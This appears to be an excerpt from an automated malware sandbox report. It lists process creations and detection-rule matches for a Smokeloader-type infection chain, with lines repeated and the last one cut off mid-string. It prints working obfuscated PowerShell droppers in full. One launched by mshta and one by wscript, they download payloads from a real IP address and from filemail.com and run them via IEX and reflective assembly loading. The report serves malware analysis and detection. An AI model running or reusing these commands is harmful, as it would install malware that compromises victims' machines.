                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysTEM32\wiNdoWSPoWeRShElL\V1.0\PoWERsHeLl.EXe" "pOWersheLL -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe ; INvokE-EXPressiON($(INvOkE-ExpressiON('[SystEM.tExt.encoDinG]'+[char]0X3A+[char]58+'UTF8.GetsTRIng([SyStEm.cOnVeRT]'+[ChaR]0X3A+[chaR]58+'frombasE64StRIng('+[chaR]34+'JFhvY0VSN21mYWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYmVSZEVGaW5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxNT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkbkhyTG8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgamxXTWh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEwsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVEd1JCWENTLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHFFS3ZxKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZHpUayIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZVNQQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbHhzQnRTTVB2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYb2NFUjdtZmFjOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzgvNTMvc2VlbXliZXN0bmV0d29ya3doaWNoZ2l2ZWJlc3R0aGluZ3NlbnRpcmVsaWZld2l0aG1lLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVteWJlc3RuZXR3b3Jrd2hpY2hnaXZlYmVzdHRoaW5nc2VudGlyZWxpZmV3aXRoLnZiUyIsMCwwKTtzVEFydC1zbEVFUCgzKTtJRVggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHNlZW15YmVzdG5ldHdvcmt3aGljaGdpdmViZXN0dGhpbmdzZW50aXJlbGlmZXdpdGgudmJTIg=='+[chaR]0X22+'))')))"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdzZVlpbWFnZVUnKydybCA9IFB1SWh0JysndHBzJysnOicrJy8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbCcrJ2UvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3QnKydHcm5USUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgUHVJO3NlWXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XJysnZWJDbGllbnQ7c2VZaW1hZ2VCeXRlcyA9IHNlWXdlYkNsaWVuJysndC5Eb3dubG9hZERhdGEoc2VZaW1hZ2VVcmwpO3NlWWltYWcnKydlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKHNlWWltYWdlQnl0JysnZXMpO3NlWXN0YXJ0RmxhZyA9IFB1STw8QkFTRTY0XycrJ1NUQVJUPj5QdUk7c2VZZW5kRicrJ2xhZyA9IFB1SScrJzw8QkFTRTY0X0VORD4+UHVJO3NlWXN0YXJ0SW5kZXggPSBzZVlpbWFnZVRleHQuSW5kZXhPZignKydzZVlzdGFydEZsYWcpO3NlWWVuZCcrJ0luZGV4ID0gc2VZaW1hZ2VUZXh0LkluZGV4T2Yoc2VZZW5kRmxhZyk7cycrJ2VZc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHNlWWVuZEluZGV4IC1ndCBzZVlzdGFydEluZGV4O3MnKydlWXN0YXJ0SW5kZXggKz0gc2VZc3RhcnRGbGFnLkxlbmd0aDtzZVliYXNlNjRMZW5ndGggPSBzZVllbmRJbmRleCAtIHNlWXN0YXJ0SW5kZXg7c2VZYmFzZTY0Q29tbWFuZCA9JysnIHNlJysnWWltYWcnKydlVCcrJ2V4dC5TdWJzdHJpbmcoc2VZc3RhcnRJbmRleCwnKycgc2VZYmFzZTY0TGVuZ3RoKTtzZVliYXNlNjRSZXZlcnNlZCA9IC1qb2luIChzZVliYXNlNjRDb21tYW5kJysnLlRvQ2hhckFycmF5KCkgMnBPIEZvckUnKydhY2gtT2JqZWN0IHsgc2VZXyB9KVstMS4uLShzZVknKydiYXNlNjRDb21tYW5kLkxlbmd0aCldO3NlWScrJ2NvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQycrJ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJysnc2VZYmFzZTY0UmV2ZXJzZWQpO3NlWScrJ2xvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsJysnZWN0aW9uLkFzc2VtYmx5XScrJzo6TG9hZChzZVljb21tYW5kQnl0ZXMpO3NlWXZhaU1ldGhvZCA9IFsnKydkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoUHVJVkFJUHVJKTtzZVl2YWlNZScrJ3Rob2QuSW52bycrJ2tlKHNlWW51bGwsIEAoUHVJdHh0LlRHUkZGUlcvMzUvODcxLjQ0LjI3MS43MDEvLycrJzpwdHRoUHVJLCBQdUlkZXNhdGl2YWRvUHVJLCBQdUlkJysnZXNhdGl2YWRvUHVJLCBQdScrJ0lkZXNhdGl2YWRvUHVJLCBQdUlhc3BuZXRfY29tcGlsJysnZXJQdUksIFB1SWRlc2F0aXZhZG9QdUksICcrJ1B1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkbycrJ1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkb1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1STFQdUksUHVJZGVzYXRpdmFkb1B1SSkpOycpLnJFUGxhQ0UoJ1B1SScsW1N0ckluR11bQ0hBUl0zOSkuckVQbGFDRSgnMnBPJywnfCcpLnJFUGxhQ0UoJ3NlWScsJyQnKXwgLiAoKGdWICcqTWRyKicpLm5BbUVbMywxMSwyXS1qT0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('seYimageU'+'rl = PuIht'+'tps'+':'+'//1017.filemail.com/api/fil'+'e/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvSt'+'GrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f PuI;seYwebClient = New-Object System.Net.W'+'ebClient;seYimageBytes = seYwebClien'+'t.DownloadData(seYimageUrl);seYimag'+'eText = [System.Text.Encoding]::UTF8.GetString(seYimageByt'+'es);seYstartFlag = PuI<<BASE64_'+'START>>PuI;seYendF'+'lag = PuI'+'<<BASE64_END>>PuI;seYstartIndex = seYimageText.IndexOf('+'seYstartFlag);seYend'+'Index = seYimageText.IndexOf(seYendFlag);s'+'eYstartIndex -ge 0 -and seYendIndex -gt seYstartIndex;s'+'eYstartIndex += seYstartFlag.Length;seYbase64Length = seYendIndex - seYstartIndex;seYbase64Command ='+' se'+'Yimag'+'eT'+'ext.Substring(seYstartIndex,'+' seYbase64Length);seYbase64Reversed = -join (seYbase64Command'+'.ToCharArray() 2pO ForE'+'ach-Object { seY_ })[-1..-(seY'+'base64Command.Length)];seY'+'commandBytes = [System.C'+'onvert]::FromBase64String('+'seYbase64Reversed);seY'+'loadedAssembly = [System.Refl'+'ection.Assembly]'+'::Load(seYcommandBytes);seYvaiMethod = ['+'dnlib.IO.Home].GetMethod(PuIVAIPuI);seYvaiMe'+'thod.Invo'+'ke(seYnull, @(PuItxt.TGRFFRW/35/871.44.271.701//'+':ptthPuI, PuIdesativadoPuI, PuId'+'esativadoPuI, Pu'+'IdesativadoPuI, PuIaspnet_compil'+'erPuI, PuIdesativadoPuI, '+'PuIdesativadoPuI,PuIdesativado'+'PuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuI1PuI,PuIdesativadoPuI));').rEPlaCE('PuI',[StrInG][CHAR]39).rEPlaCE('2pO','|').rEPlaCE('seY','$')| . ((gV '*Mdr*').nAmE[3,11,2]-jOIN'')"
                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysTEM32\wiNdoWSPoWeRShElL\V1.0\PoWERsHeLl.EXe" "pOWersheLL -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe ; INvokE-EXPressiON($(INvOkE-ExpressiON('[SystEM.tExt.encoDinG]'+[char]0X3A+[char]58+'UTF8.GetsTRIng([SyStEm.cOnVeRT]'+[ChaR]0X3A+[chaR]58+'frombasE64StRIng('+[chaR]34+'JFhvY0VSN21mYWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYmVSZEVGaW5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxNT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkbkhyTG8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgamxXTWh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEwsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVEd1JCWENTLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHFFS3ZxKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZHpUayIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZVNQQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbHhzQnRTTVB2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYb2NFUjdtZmFjOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzgvNTMvc2VlbXliZXN0bmV0d29ya3doaWNoZ2l2ZWJlc3R0aGluZ3NlbnRpcmVsaWZld2l0aG1lLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVteWJlc3RuZXR3b3Jrd2hpY2hnaXZlYmVzdHRoaW5nc2VudGlyZWxpZmV3aXRoLnZiUyIsMCwwKTtzVEFydC1zbEVFUCgzKTtJRVggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHNlZW15YmVzdG5ldHdvcmt3aGljaGdpdmViZXN0dGhpbmdzZW50aXJlbGlmZXdpdGgudmJTIg=='+[chaR]0X22+'))')))"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exeJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdzZVlpbWFnZVUnKydybCA9IFB1SWh0JysndHBzJysnOicrJy8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbCcrJ2UvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3QnKydHcm5USUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgUHVJO3NlWXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XJysnZWJDbGllbnQ7c2VZaW1hZ2VCeXRlcyA9IHNlWXdlYkNsaWVuJysndC5Eb3dubG9hZERhdGEoc2VZaW1hZ2VVcmwpO3NlWWltYWcnKydlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKHNlWWltYWdlQnl0JysnZXMpO3NlWXN0YXJ0RmxhZyA9IFB1STw8QkFTRTY0XycrJ1NUQVJUPj5QdUk7c2VZZW5kRicrJ2xhZyA9IFB1SScrJzw8QkFTRTY0X0VORD4+UHVJO3NlWXN0YXJ0SW5kZXggPSBzZVlpbWFnZVRleHQuSW5kZXhPZignKydzZVlzdGFydEZsYWcpO3NlWWVuZCcrJ0luZGV4ID0gc2VZaW1hZ2VUZXh0LkluZGV4T2Yoc2VZZW5kRmxhZyk7cycrJ2VZc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHNlWWVuZEluZGV4IC1ndCBzZVlzdGFydEluZGV4O3MnKydlWXN0YXJ0SW5kZXggKz0gc2VZc3RhcnRGbGFnLkxlbmd0aDtzZVliYXNlNjRMZW5ndGggPSBzZVllbmRJbmRleCAtIHNlWXN0YXJ0SW5kZXg7c2VZYmFzZTY0Q29tbWFuZCA9JysnIHNlJysnWWltYWcnKydlVCcrJ2V4dC5TdWJzdHJpbmcoc2VZc3RhcnRJbmRleCwnKycgc2VZYmFzZTY0TGVuZ3RoKTtzZVliYXNlNjRSZXZlcnNlZCA9IC1qb2luIChzZVliYXNlNjRDb21tYW5kJysnLlRvQ2hhckFycmF5KCkgMnBPIEZvckUnKydhY2gtT2JqZWN0IHsgc2VZXyB9KVstMS4uLShzZVknKydiYXNlNjRDb21tYW5kLkxlbmd0aCldO3NlWScrJ2NvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQycrJ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJysnc2VZYmFzZTY0UmV2ZXJzZWQpO3NlWScrJ2xvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsJysnZWN0aW9uLkFzc2VtYmx5XScrJzo6TG9hZChzZVljb21tYW5kQnl0ZXMpO3NlWXZhaU1ldGhvZCA9IFsnKydkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoUHVJVkFJUHVJKTtzZVl2YWlNZScrJ3Rob2QuSW52bycrJ2tlKHNlWW51bGwsIEAoUHVJdHh0LlRHUkZGUlcvMzUvODcxLjQ0LjI3MS43MDEvLycrJzpwdHRoUHVJLCBQdUlkZXNhdGl2YWRvUHVJLCBQdUlkJysnZXNhdGl2YWRvUHVJLCBQdScrJ0lkZXNhdGl2YWRvUHVJLCBQdUlhc3BuZXRfY29tcGlsJysnZXJQdUksIFB1SWRlc2F0aXZhZG9QdUksICcrJ1B1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkbycrJ1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkb1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1STFQdUksUHVJZGVzYXRpdmFkb1B1SSkpOycpLnJFUGxhQ0UoJ1B1SScsW1N0ckluR11bQ0hBUl0zOSkuckVQbGFDRSgnMnBPJywnfCcpLnJFUGxhQ0UoJ3NlWScsJyQnKXwgLiAoKGdWICcqTWRyKicpLm5BbUVbMywxMSwyXS1qT0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('seYimageU'+'rl = PuIht'+'tps'+':'+'//1017.filemail.com/api/fil'+'e/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvSt'+'GrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f PuI;seYwebClient = New-Object System.Net.W'+'ebClient;seYimageBytes = seYwebClien'+'t.DownloadData(seYimageUrl);seYimag'+'eText = [System.Text.Encoding]::UTF8.GetString(seYimageByt'+'es);seYstartFlag = PuI<<BASE64_'+'START>>PuI;seYendF'+'lag = PuI'+'<<BASE64_END>>PuI;seYstartIndex = seYimageText.IndexOf('+'seYstartFlag);seYend'+'Index = seYimageText.IndexOf(seYendFlag);s'+'eYstartIndex -ge 0 -and seYendIndex -gt seYstartIndex;s'+'eYstartIndex += seYstartFlag.Length;seYbase64Length = seYendIndex - seYstartIndex;seYbase64Command ='+' se'+'Yimag'+'eT'+'ext.Substring(seYstartIndex,'+' seYbase64Length);seYbase64Reversed = -join (seYbase64Command'+'.ToCharArray() 2pO ForE'+'ach-Object { seY_ })[-1..-(seY'+'base64Command.Length)];seY'+'commandBytes = [System.C'+'onvert]::FromBase64String('+'seYbase64Reversed);seY'+'loadedAssembly = [System.Refl'+'ection.Assembly]'+'::Load(seYcommandBytes);seYvaiMethod = ['+'dnlib.IO.Home].GetMethod(PuIVAIPuI);seYvaiMe'+'thod.Invo'+'ke(seYnull, @(PuItxt.TGRFFRW/35/871.44.271.701//'+':ptthPuI, PuIdesativadoPuI, PuId'+'esativadoPuI, Pu'+'IdesativadoPuI, PuIaspnet_compil'+'erPuI, PuIdesativadoPuI, '+'PuIdesativadoPuI,PuIdesativado'+'PuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuI1PuI,PuIdesativadoPuI));').rEPlaCE('PuI',[StrInG][CHAR]39).rEPlaCE('2pO','|').rEPlaCE('seY','$')| . ((gV '*Mdr*').nAmE[3,11,2]-jOIN'')"Jump to behavior
                Source: 0000000D.00000002.2178722261.0000000000E31000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 0000000D.00000002.2175832191.0000000000E10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 0000000E.00000002.3010408445.0000000003441000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: Process Memory Space: powershell.exe PID: 6168, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 5568, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdzZVlpbWFnZVUnKydybCA9IFB1SWh0JysndHBzJysnOicrJy8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbCcrJ2UvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3QnKydHcm5USUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgUHVJO3NlWXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XJysnZWJDbGllbnQ7c2VZaW1hZ2VCeXRlcyA9IHNlWXdlYkNsaWVuJysndC5Eb3dubG9hZERhdGEoc2VZaW1hZ2VVcmwpO3NlWWltYWcnKydlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKHNlWWltYWdlQnl0JysnZXMpO3NlWXN0YXJ0RmxhZyA9IFB1STw8QkFTRTY0XycrJ1NUQVJUPj5QdUk7c2VZZW5kRicrJ2xhZyA9IFB1SScrJzw8QkFTRTY0X0VORD4+UHVJO3NlWXN0YXJ0SW5kZXggPSBzZVlpbWFnZVRleHQuSW5kZXhPZignKydzZVlzdGFydEZsYWcpO3NlWWVuZCcrJ0luZGV4ID0gc2VZaW1hZ2VUZXh0LkluZGV4T2Yoc2VZZW5kRmxhZyk7cycrJ2VZc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHNlWWVuZEluZGV4IC1ndCBzZVlzdGFydEluZGV4O3MnKydlWXN0YXJ0SW5kZXggKz0gc2VZc3RhcnRGbGFnLkxlbmd0aDtzZVliYXNlNjRMZW5ndGggPSBzZVllbmRJbmRleCAtIHNlWXN0YXJ0SW5kZXg7c2VZYmFzZTY0Q29tbWFuZCA9JysnIHNlJysnWWltYWcnKydlVCcrJ2V4dC5TdWJzdHJpbmcoc2VZc3RhcnRJbmRleCwnKycgc2VZYmFzZTY0TGVuZ3RoKTtzZVliYXNlNjRSZXZlcnNlZCA9IC1qb2luIChzZVliYXNlNjRDb21tYW5kJysnLlRvQ2hhckFycmF5KCkgMnBPIEZvckUnKydhY2gtT2JqZWN0IHsgc2VZXyB9KVstMS4uLShzZVknKydiYXNlNjRDb21tYW5kLkxlbmd0aCldO3NlWScrJ2NvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQycrJ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJysnc2VZYmFzZTY0UmV2ZXJzZWQpO3NlWScrJ2xvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsJysnZWN0aW9uLkFzc2VtYmx5XScrJzo6TG9hZChzZVljb21tYW5kQnl0ZXMpO3NlWXZhaU1ldGhvZCA9IFsnKydkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoUHVJVkFJUHVJKTtzZVl2YWlNZScrJ3Rob2QuSW52bycrJ2tlKHNlWW51bGwsIEAoUHVJdHh0LlRHUkZGUlcvMzUvODcxLjQ0LjI3MS43MDEvLycrJzpwdHRoUHVJLCBQdUlkZXNhdGl2YWRvUHVJLCBQdUlkJysnZXNhdGl2YWRvUHVJLCBQdScrJ0lkZXNhdGl2YWRvUHVJLCBQdUlhc3BuZXRfY29tcGlsJysnZXJQdUksIFB1SWRlc2F0aXZhZG9QdUksICcrJ1B1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkbycrJ1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkb1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1STFQdUksUHVJZGVzYXRpdmFkb1B1SSkpOycpLnJFUGxhQ0UoJ1B1SScsW1N0ckluR11bQ0hBUl0zOSkuckVQbGFDRSgnMnBPJywnfCcpLnJFUGxhQ0UoJ3NlWScsJyQnKXwgLiAoKGdWICcqTWRyKicpLm5BbUVbMywxMSwyXS1qT0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdzZVlpbWFnZVUnKydybCA9IFB1SWh0JysndHBzJysnOicrJy8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbCcrJ2UvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3QnKydHcm5USUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgUHVJO3NlWXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XJysnZWJDbGllbnQ7c2VZaW1hZ2VCeXRlcyA9IHNlWXdlYkNsaWVuJysndC5Eb3dubG9hZERhdGEoc2VZaW1hZ2VVcmwpO3NlWWltYWcnKydlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKHNlWWltYWdlQnl0JysnZXMpO3NlWXN0YXJ0RmxhZyA9IFB1STw8QkFTRTY0XycrJ1NUQVJUPj5QdUk7c2VZZW5kRicrJ2xhZyA9IFB1SScrJzw8QkFTRTY0X0VORD4+UHVJO3NlWXN0YXJ0SW5kZXggPSBzZVlpbWFnZVRleHQuSW5kZXhPZignKydzZVlzdGFydEZsYWcpO3NlWWVuZCcrJ0luZGV4ID0gc2VZaW1hZ2VUZXh0LkluZGV4T2Yoc2VZZW5kRmxhZyk7cycrJ2VZc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHNlWWVuZEluZGV4IC1ndCBzZVlzdGFydEluZGV4O3MnKydlWXN0YXJ0SW5kZXggKz0gc2VZc3RhcnRGbGFnLkxlbmd0aDtzZVliYXNlNjRMZW5ndGggPSBzZVllbmRJbmRleCAtIHNlWXN0YXJ0SW5kZXg7c2VZYmFzZTY0Q29tbWFuZCA9JysnIHNlJysnWWltYWcnKydlVCcrJ2V4dC5TdWJzdHJpbmcoc2VZc3RhcnRJbmRleCwnKycgc2VZYmFzZTY0TGVuZ3RoKTtzZVliYXNlNjRSZXZlcnNlZCA9IC1qb2luIChzZVliYXNlNjRDb21tYW5kJysnLlRvQ2hhckFycmF5KCkgMnBPIEZvckUnKydhY2gtT2JqZWN0IHsgc2VZXyB9KVstMS4uLShzZVknKydiYXNlNjRDb21tYW5kLkxlbmd0aCldO3NlWScrJ2NvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQycrJ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJysnc2VZYmFzZTY0UmV2ZXJzZWQpO3NlWScrJ2xvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsJysnZWN0aW9uLkFzc2VtYmx5XScrJzo6TG9hZChzZVljb21tYW5kQnl0ZXMpO3NlWXZhaU1ldGhvZCA9IFsnKydkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoUHVJVkFJUHVJKTtzZVl2YWlNZScrJ3Rob2QuSW52bycrJ2tlKHNlWW51bGwsIEAoUHVJdHh0LlRHUkZGUlcvMzUvODcxLjQ0LjI3MS43MDEvLycrJzpwdHRoUHVJLCBQdUlkZXNhdGl2YWRvUHVJLCBQdUlkJysnZXNhdGl2YWRvUHVJLCBQdScrJ0lkZXNhdGl2YWRvUHVJLCBQdUlhc3BuZXRfY29tcGlsJysnZXJQdUksIFB1SWRlc2F0aXZhZG9QdUksICcrJ1B1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkbycrJ1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkb1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1STFQdUksUHVJZGVzYXRpdmFkb1B1SSkpOycpLnJFUGxhQ0UoJ1B1SScsW1N0ckluR11bQ0hBUl0zOSkuckVQbGFDRSgnMnBPJywnfCcpLnJFUGxhQ0UoJ3NlWScsJ